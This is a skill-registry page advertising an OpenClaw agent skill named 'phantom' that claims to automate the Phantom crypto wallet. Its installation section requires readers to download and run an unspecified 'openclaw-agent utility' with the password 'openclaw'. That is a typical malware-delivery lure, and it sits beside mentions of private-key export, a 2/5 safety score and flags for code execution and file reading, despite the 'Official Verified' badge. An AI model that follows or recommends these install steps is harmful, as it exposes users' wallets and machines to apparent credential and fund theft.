ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified finance Safety 2/5

phantom

Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.

Why use this skill?

Automate your Phantom wallet operations using OpenClaw. Easily manage Solana/EVM accounts, import tokens, check balances, and troubleshoot transactions.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/phantom-fdjtg
Or

What This Skill Does

The phantom skill enables your OpenClaw AI agent to interface directly with the Phantom browser extension, serving as a robust bridge between AI-driven commands and your Solana, Ethereum, or Polygon blockchain assets. By leveraging the openclaw-agent utility, this skill allows users to automate complex wallet tasks such as importing tokens, configuring custom network RPCs, and managing connected dApps. It provides a comprehensive set of command-line and automation hooks that eliminate manual clicking, allowing the agent to handle account management, balance inquiries, and transaction troubleshooting natively within the agent environment.

Installation

To begin, ensure you have the Phantom browser extension installed in your browser of choice (Chrome, Firefox, or Brave). Critical prerequisite: you must download and run the openclaw-agent utility (password: openclaw). For macOS users, follow the terminal script instructions provided in the official documentation. Once the agent is active, install the skill by running the command: clawhub install openclaw/skills/skills/hightower6eu/phantom-fdjtg in your OpenClaw terminal.

Use Cases

This skill is designed for developers, DeFi power users, and NFT collectors who require hands-free blockchain interaction. Typical use cases include automating the addition of new EVM networks like Arbitrum or Base, quickly importing SPL tokens via contract address, and managing security by revoking permissions from connected dApps. It is also an essential tool for troubleshooting stuck transactions by allowing the agent to fetch status signatures directly from the blockchain via CLI calls.

Example Prompts

  1. "Phantom, add the Arbitrum One network to my wallet using the standard RPC settings."
  2. "Check my current wallet balance for the USDC token and tell me if I have enough gas for a transaction."
  3. "Review my connected dApps in Phantom and revoke access for any applications that I haven't used in over a month."

Tips & Limitations

Always ensure the openclaw-agent is running before issuing commands, as the skill cannot establish a local connection without it. Be extremely cautious when handling private keys; the skill provides mechanisms for export, but you should never share these keys with unauthorized AI processes or public interfaces. When dealing with priority fees, start with the 'Normal' setting to avoid overpaying for simple transactions, only scaling to 'Turbo' during network congestion.

Metadata

Stars2387
Views0
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-phantom-fdjtg": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#wallet#web3#solana#evm#blockchain
Safety Score: 2/5

Flags: network-access, file-read, code-execution